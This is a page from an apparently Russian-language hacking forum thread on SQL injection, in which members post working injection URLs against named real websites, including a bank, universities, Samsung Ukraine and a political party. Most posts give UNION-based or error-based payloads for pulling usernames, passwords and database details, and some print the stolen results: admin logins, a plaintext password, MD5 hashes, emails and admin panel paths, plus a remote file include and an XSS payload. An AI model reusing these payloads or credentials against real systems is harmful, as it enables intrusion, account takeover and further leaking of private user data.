SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    Code:
    http://www.yuta.co.yu/en/yuta/member.asp?id=1+or+1=(SELECT+TOP+1+USERNAME+from+Admin)--
    Code:
    http://www.yuta.co.yu/en/yuta/member.asp?id=1+or+1=(SELECT+TOP+1+PASSWD+from+Admin)--
    Данные админа:

    Login: admin
    Password: P@ssw0rd

    Админка находится по адресу
    Code:
    http://www.yuta.co.yu/admin/
     
  2. Red_Red1

    Red_Red1 Banned

    Joined:
    12 Jan 2007
    Messages:
    246
    Likes Received:
    258
    Reputations:
    83
    :) Четвертая версия не мешает провести ПХП иньекцию, так что пост надо в ПХП. :)

    http://www.shidur.us/index.php?page=[шелл] - удаленные инклуд :)
     
    1 person likes this.
  3. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Банк "Левобережный"
    Давно мечтал похекать какой-нибудь банковский ресурс, но прав для чтения из users не хватает, не знаю что еще можно сделать :(
    Версия 4.0.18
     
    2 people like this.
  4. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    бригада ;) строительная )))
    Code:
    http://brigada.uz/plugins/ansmt/ansmt_view.php?id=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_name,user_loginname,user_password,user_email),8,9,10,11,12,13,14+from+brigada_user
    стоит двиг е107.
     
    1 person likes this.
  5. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Урал Инфо Проект
    Code:
    http://www.uip.ru/index.php?id=-3'+UNION+SELECT+1,%3Cscript%3Ealert('H00k%20%E1%FB%EB%20%E7%E4%E5%F1%FC!')%3C/script%3E,3,4,5,6,7,8+FROM+news+--+
     
  6. halkfild

    halkfild Members of Antichat

    Joined:
    11 Nov 2005
    Messages:
    365
    Likes Received:
    578
    Reputations:
    313
    в антибояне проверял вроде нет

    5.0.22:fortline@localhost:fortline

    admin:Y2g3Yjhh


    adm_music@localhost:4.0.27-log:music
     
    _________________________
    #2946 halkfild, 27 Aug 2007
    Last edited: 27 Aug 2007
  7. Kaimi

    Kaimi Well-Known Member

    Joined:
    23 Aug 2007
    Messages:
    1,732
    Likes Received:
    811
    Reputations:
    231
    Code:
    http://rustelcard.ru/index.php?option=com_rwcards&task=listCards&category_id=-1'union%20select%201,2,03,4,concat(char(117,115,101,114,110,97,109,101,58),username,char(112,97,115,115,119,111,114,100,58),password),50,044,076,0678,07%20from%20jos_users/*
    username:admin
    password:06c09e25d642a677aa787b2cdee94350
     
    _________________________
  8. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    Недвижимость
    Code:
    http://base.gwru.ru/in.php?id=-459+UNION+SELECT+1,2,3,password,email,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+FROM+users+--+
    email:[email protected]
    password:60bcdf9367b7aada606e446fecc1a47d
    Также на сайте полно Xss
     
  9. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    Либеральная партия Украины
    http://www.lpu.org.ua/index.php?area=1+union+select+1,2,3,4,5,6/*
    2Grey:
    прошу прощенья но по поводу баяна не знал... и вообще каковы критерии для обощения данными аргументами... есть где-то ещё?..
     
    #2949 Y.Dmitriy, 27 Aug 2007
    Last edited: 28 Aug 2007
    2 people like this.
  10. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    4 мускул :( код: http://www.press.try.md/print.php?iddb=Polit&id=-87829+union+select+1,concat(version(),user(),database()),3,4,5,6,7,8/* чет не могу подобрать код: http://press.samsung.ua/news/card.php?id=-212+union+select+1,column_name,3+from+information_schema.columns/* если боян,то не бейте в репу,а лучше дайте ссылку на антибоян
     
    #2950 sasTO, 27 Aug 2007
    Last edited: 28 Aug 2007
  11. x.Elf

    x.Elf Elder - Старейшина

    Joined:
    24 May 2007
    Messages:
    34
    Likes Received:
    18
    Reputations:
    0
    Ты скажи: откуда в 4 мускуле бд information_schema
     
  12. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    в каком 4? Я про самсунг сказал,а там 5 мускул
     
  13. Nazaret2005

    Nazaret2005 Member

    Joined:
    11 Aug 2007
    Messages:
    25
    Likes Received:
    14
    Reputations:
    -9
    Admins
    Visitor
    Content
    Medias
    Есть ещё много
    Code:
    http://press.samsung.ua/news/card.php?id=-1+union+select+1111,role,concat(login,char(58),passw)+from+user+where+id=22+limit+0,1/*
    меняй id и вытаскивай данные :D

    Как посмотреть какие есть таблицы и поля:

    Code:
    http://press.samsung.ua/news/card.php?id=-1+union+select+1,concat(column_name,char(58),table_name),3+from+information_schema.columns+limit+349,1/*
    меняй limit , он будет показывать какие поля есть в таблице (Поле:Таблица)
     
    #2953 Nazaret2005, 28 Aug 2007
    Last edited: 28 Aug 2007
  14. 4nob1oz

    4nob1oz Elder - Старейшина

    Joined:
    9 Jul 2007
    Messages:
    30
    Likes Received:
    22
    Reputations:
    0
    nero.com

    http://www.nero.com/eng/showpress.php?id=-1+GROUP+BY+13/*
     
  15. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    utsa.edu - PR=7
    Code:
    http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=@@version--
    http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=(select%20system_user)
    http://www.utsa.edu/today/archive/index.cfm?fuseaction=category&iStartRow=1&categoryid=(select%20db_name())
    

    sju.edu - PR=7
    Code:
    http://www.sju.edu/hsb/campbell/research-guides/index-new2.php?subid=-1%20union%20select%201,2,3,4,5,6,7,8,version(),user(),11,12,13,database(),15,16,17/*
    

    uprm.edu - PR=7
    Code:
    http://www.uprm.edu/library/cre/list_dbs.php?char=1'%20or%201=-1%20union%20select%201,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database()),0x71),0x71),3,4,5,6,7,8,9,10/*
    
     
    1 person likes this.
  16. iRedX

    iRedX Elder - Старейшина

    Joined:
    18 Jun 2002
    Messages:
    117
    Likes Received:
    11
    Reputations:
    9
    PR8

    http://www.aiim.org/standards.asp?id=1+or+1=@@version--

    Таблицы:
    'vwWebGroups'
    vwWebArticleTypes
    vwActivePages
    vwWebOrderDetails
    vwForums
    'vwWebModules'
    'vwPollResults'
    'vwIndustryEventTypes'
    'vwForumPosts'
    'vwWebUserActivity'
    'vwIndustryEvents'
    'vwPollQuestions'
    'vwWebUsers'
    vwChapDisplay
    vwWebEntityConfigs
    vwWebApplications
    vwCompanies
    vwChapAllList
    vwWebEntityMatchPolicyItems
    'vwIndustryEventPollIds'
    'vwWebArticles'
    vwWebEntityMatchPolicies
    vwMarkets
    'vwWebProducts'
    'vwAIIMChapters
    и тд.

    но при запросе,
    http://www.aiim.org/standards.asp?id=1+or+1=(select+top+1+RequestDoc1+from+dbo.vwWebUsers)--

    и при попытке использовать CMD выдается "The Querystring is invalid"
     
    1 person likes this.
  17. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.row-people.de/news/news.php?id=-1394+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,29+from+information_schema.tables/*
    _4nob1oz - боян(
     
    1 person likes this.
  18. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Давно не выкладывал :)
    Code:
    http://www.topguard.co.kr/noticeboard/notice_view.php?number=-8+union+select+1,2,3,4,5,6,7,concat_ws(0x3C62722F3E,USER(),DATABASE(),VERSION()),9,10,11,12,13,14,15,16,17/*
    Старенькая БД :)
    Code:
    http://www.cleareyes.co.kr/itop20/gasa.php?number=-1+union+select+1,2,3,4,5,6,concat_ws(0x3C62722F3E,USER(),DATABASE(),VERSION()),8,9,10,11,12,13
     
    #2958 NOmeR1, 28 Aug 2007
    Last edited: 28 Aug 2007
    1 person likes this.
  19. Constantine

    Constantine Elder - Старейшина

    Joined:
    24 Nov 2006
    Messages:
    798
    Likes Received:
    710
    Reputations:
    301
    Обновили антибоян, незабываем юзать.

    http://filefront.jino-net.ru/sql.html
     
    1 person likes this.
  20. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Code:
    http://bystrzyca.pl/shows.php?nr=-9+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15+from+information_schema.tables+limit+16,1/*
    Code:
    http://www.tigs-thaiwok.ch/ger.php?nr=-13+union+select+1,table_name,3,4,5,6,7,8,9+from+information_schema.tables+limit+16,1/*
     
    #2960 NOmeR1, 28 Aug 2007
    Last edited: 28 Aug 2007
Thread Status:
Not open for further replies.